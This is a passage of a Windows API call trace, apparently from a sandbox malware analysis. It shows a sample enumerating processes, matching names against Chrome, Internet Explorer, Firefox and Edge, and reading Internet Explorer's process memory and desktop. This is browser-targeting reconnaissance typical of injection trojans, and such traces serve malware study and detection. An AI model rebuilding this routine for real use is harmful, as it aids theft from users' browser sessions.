	[0221.754] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.755] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0221.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.756] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.756] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0221.757] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x51e0
	[0221.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.757] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0221.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.758] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.758] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0221.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.759] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.759] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0221.760] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x51e4
	[0221.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.760] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0221.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.761] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.761] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0221.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.762] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.762] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0221.763] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x51e8
	[0221.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.763] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0221.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.764] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.764] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0221.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.764] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.765] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0221.766] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x51ec
	[0221.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.766] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0221.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.766] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0221.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.766] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0221.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.767] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.767] NtQueryInformationProcess (in: ProcessHandle=0x51ec, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0221.767] ReadProcessMemory (in: hProcess=0x51ec, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0221.767] ReadProcessMemory (in: hProcess=0x51ec, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0221.767] ReadProcessMemory (in: hProcess=0x51ec, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0221.767] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0221.767] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0221.768] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x51f0
	[0221.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.768] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0221.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.768] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0221.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.769] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0221.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.769] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.769] NtQueryInformationProcess (in: ProcessHandle=0x51f0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0221.769] ReadProcessMemory (in: hProcess=0x51f0, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0221.769] ReadProcessMemory (in: hProcess=0x51f0, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0221.769] ReadProcessMemory (in: hProcess=0x51f0, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0221.769] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0221.770] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0221.774] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x51f4
	[0221.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.774] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0221.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.775] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.775] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0221.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.775] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.776] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0221.776] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x51f8
	[0221.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.776] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0221.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.777] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.777] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0221.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.777] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.778] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.778] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x51fc
	[0221.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.779] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.779] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.779] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.779] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.780] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.780] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.781] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x5200
	[0221.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.781] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.782] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.782] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.782] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.782] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.783] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x5204
	[0221.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.783] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.784] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.784] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.784] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.784] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0221.785] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x5208
	[0221.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.785] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0221.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.786] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.786] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0221.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.786] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.787] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0
	[0221.787] CloseHandle (hObject=0x4fd0) returned 1
	[0221.787] Sleep (dwMilliseconds=0x64) 
	[0221.895] GetCurrentProcessId () returned 0x110
	[0221.895] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0221.903] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0221.904] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0221.905] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0221.906] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x520c
	[0221.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.906] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0221.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.906] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.907] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0221.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.907] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.907] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0221.908] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x5210
	[0221.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.908] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0221.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.909] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.909] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0221.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.910] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.910] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0221.911] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x5214
	[0221.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.912] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0221.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.912] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.913] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0221.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.913] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.913] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0221.914] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x5218
	[0221.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.914] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0221.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.915] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.915] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0221.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.915] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.915] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0221.916] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x521c
	[0221.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.916] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0221.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.916] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.917] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0221.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.918] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.918] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0221.919] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x5220
	[0221.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.919] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0221.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.919] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.919] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0221.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.920] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.920] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0221.921] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x5224
	[0221.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.921] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0221.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.921] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.921] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0221.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.922] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.922] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0221.923] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x5228
	[0221.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.923] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0221.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.923] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.923] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0221.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.924] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.924] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.924] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x522c
	[0221.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.925] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.925] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.925] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.926] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0221.926] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0221.927] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x5230
	[0221.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.927] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0221.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.927] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0221.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.928] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0221.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0221.928] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
